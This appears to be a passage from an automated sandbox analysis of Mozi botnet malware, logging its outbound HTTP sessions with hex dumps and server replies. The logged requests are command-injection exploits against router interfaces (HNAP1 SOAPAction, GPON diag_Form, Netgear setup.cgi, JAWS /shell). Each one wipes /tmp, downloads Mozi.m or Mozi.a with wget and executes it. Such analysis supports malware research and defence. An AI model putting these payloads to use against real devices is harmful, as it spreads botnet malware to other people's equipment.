                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:04.676696062 CET1162OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:06.696851969 CET1175OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:10.732965946 CET1198OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:18.813317060 CET1243OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:34.990187883 CET1329OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        29192.168.2.2044974192.155.170.24480
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:09.756969929 CET1189OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 192.155.170.244:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 15:01:09.980545044 CET1190INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Jan 2021 14:01:09 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 146
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        3192.168.2.2059680115.15.161.148080
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:57:53.818731070 CET214OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
                                                                                                        Jan 6, 2021 14:57:54.091607094 CET214INHTTP/1.1 404 Not Found
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 30
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        30192.168.2.2051890190.114.190.2288080
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:09.920361042 CET1190OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 15:01:10.669035912 CET1197OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 15:01:11.769078970 CET1201OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 15:01:13.965116024 CET1220OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 15:01:18.365367889 CET1240OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 15:01:27.149779081 CET1292OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        31192.168.2.205726251.178.69.10180
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:16.609090090 CET1233OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 51.178.69.101:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:16.665462971 CET1233INHTTP/1.1 426 Upgrade Required
                                                                                                        date: Wed, 06 Jan 2021 14:01:16 GMT
                                                                                                        server: istio-envoy
                                                                                                        connection: close
                                                                                                        content-length: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        32192.168.2.205323666.201.89.1380
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:23.721649885 CET1267OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 15:01:23.877624989 CET1269INHTTP/1.1 404 Not Found
                                                                                                        Cache-Control: private
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        Date: Wed, 06 Jan 2021 14:01:22 GMT
                                                                                                        Content-Length: 4887
